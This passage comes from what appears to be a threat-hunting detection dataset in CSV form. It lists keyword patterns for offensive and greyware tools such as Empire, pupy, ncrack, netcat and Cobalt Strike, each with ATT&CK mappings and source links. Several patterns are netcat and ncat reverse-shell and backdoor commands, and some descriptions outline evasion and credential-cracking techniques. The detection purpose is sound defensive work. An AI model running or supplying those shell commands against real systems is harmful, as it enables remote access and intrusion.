facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*Naughty-Script.ps1*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*nbcojefnccbanplpoffopkoepjmhgdgh*,greyware_tool_keyword,Hoxx VPN Proxy,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*NBNSBruteForceHost*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*NBNSBruteForcePause*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*NBNSBruteForceSpoofer*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*NBNSBruteForceTarget*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*nbnsspoof.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*NBNSSpoofer*,offensive_tool_keyword,empire,Empire scripts functions. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*nbtscan -r */24*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*nbtscan -r */24*,greyware_tool_keyword,nbtscan,smb enumeration,T1135 - T1046,TA0007 - 
TA0009,N/A,N/A,discovery,https://github.com/charlesroelli/nbtscan,1,0,N/A,5,2,124,23,2016-05-26T20:16:52Z,2016-05-26T20:16:33Z -*nbtstat -n*,greyware_tool_keyword,nbtstat,Displays the NetBIOS name table of the local computer. The status of registered indicates that the name is registered either by broadcast or with a WINS server.,T1049 - T1018 - T1046,TA0007 - TA0009,N/A,N/A,Discovery,https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/nbtstat,1,0,N/A,4,10,N/A,N/A,N/A,N/A -*nc * -e /bin/bash*,greyware_tool_keyword,netcat,netcat shell,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md,1,0,greyware tool - risks of False positive !,N/A,10,51169,13280,2023-10-02T15:13:46Z,2016-10-18T07:29:07Z -*nc 127.0.0.1 4000*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,0,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*nc -l -p * -e *.bat*,greyware_tool_keyword,nc,Netcat Realy on windows - create a relay that sends packets from the local port to a netcat client connecte to the target ip on the targeted port,T1090.001 - T1021.001,TA0011 - TA0040,N/A,N/A,Network Exploitation Tools,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*nc -l -p * -e /bin/bash*,greyware_tool_keyword,nc,Netcat Backdoor on Linux - create a relay that sends packets from the local port to a netcat client connecte to the target ip on the targeted port,T1090.001 - T1021.001,TA0011 - TA0040,N/A,N/A,Network Exploitation Tools,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*nc -l -p * -e 
cmd.exe*,greyware_tool_keyword,nc,Netcat Backdoor on Windows - create a relay that sends packets from the local port to a netcat client connecte to the target ip on the targeted port,T1090.001 - T1021.001,TA0011 - TA0040,N/A,N/A,Network Exploitation Tools,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*nc -nlvp 4444*,offensive_tool_keyword,Shell3er,PowerShell Reverse Shell,T1059.001 - T1021.004 - T1090.002,TA0002 - TA0011,N/A,N/A,shell spawning,https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1,1,0,N/A,N/A,1,56,11,2023-05-07T16:02:41Z,2023-05-07T15:35:16Z -*nc -u -lvp *,greyware_tool_keyword,netcat,netcat shell listener,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md,1,0,greyware tool - risks of False positive !,N/A,10,51169,13280,2023-10-02T15:13:46Z,2016-10-18T07:29:07Z -*nc -v -n -z -w1 *-*,greyware_tool_keyword,nc,Port scanner with netcat,T1046,TA0007,N/A,N/A,Network Exploitation Tools,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*nc -vlp 4444*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*nc -vlp 4445*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - 
TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*nc -z -v * *,greyware_tool_keyword,nc,netcat common arguments,T1090.001 - T1021.001,TA0011 - TA0040,N/A,N/A,Network Exploitation Tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*nc.exe 127.0.0.1 4444*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*nc.exe -l -p 1337*,offensive_tool_keyword,PrintSpoofer,Abusing Impersonation Privileges on Windows 10 and Server 2019,T1548.002 - T1055.001 - T1055.002,TA0005 - TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,0,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*ncat * -e /bin/bash*,greyware_tool_keyword,netcat,ncat reverse shell,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md,1,0,greyware tool - risks of False positive !,N/A,10,51169,13280,2023-10-02T15:13:46Z,2016-10-18T07:29:07Z -*ncat * -p 4444*,greyware_tool_keyword,ncat,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Network Exploitation tools,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*ncat --udp * -e /bin/bash*,greyware_tool_keyword,netcat,ncat reverse shell,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell 
spawning,https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md,1,0,greyware tool - risks of False positive !,N/A,10,51169,13280,2023-10-02T15:13:46Z,2016-10-18T07:29:07Z -*nccgroup/demiguise*,offensive_tool_keyword,demiguise,The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.,T1564 - T1071.001 - T1071.004 - T1059 - T1070,TA0002 - TA0011 - TA0008,N/A,N/A,Defense Evasion,https://github.com/nccgroup/demiguise,1,1,N/A,9,10,1321,262,2022-11-09T08:12:25Z,2017-07-26T08:56:15Z -*ncrack-*.dmg*,offensive_tool_keyword,ncrack,High-speed network authentication cracking tool.,T1110.001 - T1110.002 - T1110.003,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/nmap/ncrack,1,1,N/A,N/A,10,972,238,2023-02-22T21:33:24Z,2015-12-21T23:48:00Z -*ncrack-*-setup.exe*,offensive_tool_keyword,ncrack,High-speed network authentication cracking tool.,T1110.001 - T1110.002 - T1110.003,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/nmap/ncrack,1,1,N/A,N/A,10,972,238,2023-02-22T21:33:24Z,2015-12-21T23:48:00Z -*ncrack.exe*,offensive_tool_keyword,ncrack,High-speed network authentication cracking tool.,T1110.001 - T1110.002 - T1110.003,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/nmap/ncrack,1,1,N/A,N/A,10,972,238,2023-02-22T21:33:24Z,2015-12-21T23:48:00Z 
-*NcrackInstaller.exe*,offensive_tool_keyword,ncrack,High-speed network authentication cracking tool.,T1110.001 - T1110.002 - T1110.003,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/nmap/ncrack,1,1,N/A,N/A,10,972,238,2023-02-22T21:33:24Z,2015-12-21T23:48:00Z -*ncrack-master.zip*,offensive_tool_keyword,ncrack,High-speed network authentication cracking tool.,T1110.001 - T1110.002 - T1110.003,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/nmap/ncrack,1,1,N/A,N/A,10,972,238,2023-02-22T21:33:24Z,2015-12-21T23:48:00Z -*ncrack-services*,offensive_tool_keyword,ncrack,High-speed network authentication cracking tool.,T1110.001 - T1110.002 - T1110.003,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/nmap/ncrack,1,1,N/A,N/A,10,972,238,2023-02-22T21:33:24Z,2015-12-21T23:48:00Z -*ndDelegation.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Sniffing & Spoofing,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*ndp_spoof.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*Ne0nd0g/merlin*,offensive_tool_keyword,merlin,Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/Ne0nd0g/merlin,1,1,N/A,10,10,4618,763,2023-08-27T15:47:13Z,2017-01-06T11:18:20Z -*needle_sift.x64*,offensive_tool_keyword,cobaltstrike,Strstr with user-supplied needle and filename as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Needle_Sift_BOF,1,1,N/A,10,10,30,7,2021-09-27T22:57:33Z,2021-09-27T20:13:10Z -*Needles without the Thread.pptx*,offensive_tool_keyword,ThreadlessInject,Threadless Process Injection using remote function hooking.,T1055.012 - T1055.003 - T1177,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/CCob/ThreadlessInject,1,0,N/A,10,6,552,55,2023-02-23T10:23:56Z,2023-02-05T13:50:15Z -*needlesift.cna*,offensive_tool_keyword,cobaltstrike,Strstr with user-supplied needle and filename as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/EspressoCake/Needle_Sift_BOF,1,1,N/A,10,10,30,7,2021-09-27T22:57:33Z,2021-09-27T20:13:10Z -*neo2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*neo4j console*,greyware_tool_keyword,bloodhound,he neo4j console command is used to start the Neo4j server in console mode. While it is not directly associated with a specific attack technique - it is often used in combination with tools like BloodHound to analyze and visualize data collected from Active Directory environments.,T1069,TA0007,N/A,N/A,Frameworks,https://github.com/fox-it/BloodHound.py,1,0,greyware tool - risks of False positive !,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*neo4j start*,greyware_tool_keyword,Neo4j,Neo4j queries - Computers AllowedToDelegate to other computers,T1210.002 - T1078.003 - T1046,TA0001 - TA0007 - TA0040,N/A,N/A,Reconnaissance,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*neo4jconnection.py*,offensive_tool_keyword,sprayhound,Password spraying tool and Bloodhound integration,T1110.003 - T1210.001 - T1069.002,TA0006 - TA0007 - TA0003,N/A,N/A,Credential Access,https://github.com/Hackndo/sprayhound,1,1,N/A,N/A,2,136,12,2023-02-15T11:26:53Z,2020-02-06T17:45:37Z -*neoneggplant*,offensive_tool_keyword,Github Username,author of RAT tools on github,N/A,N/A,N/A,N/A,POST Exploitation tools,https://github.com/neoneggplant,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*nessus* --set listen_address=127.0.0.1*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A 
-*Nessus-*.deb*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*Nessus-*.dmg*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*Nessus-*.msi*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*Nessus-*.rpm*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*Nessus-*.tar.gz*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*Nessus-*.txz*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*nessus_vulns_cleaner.rc*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
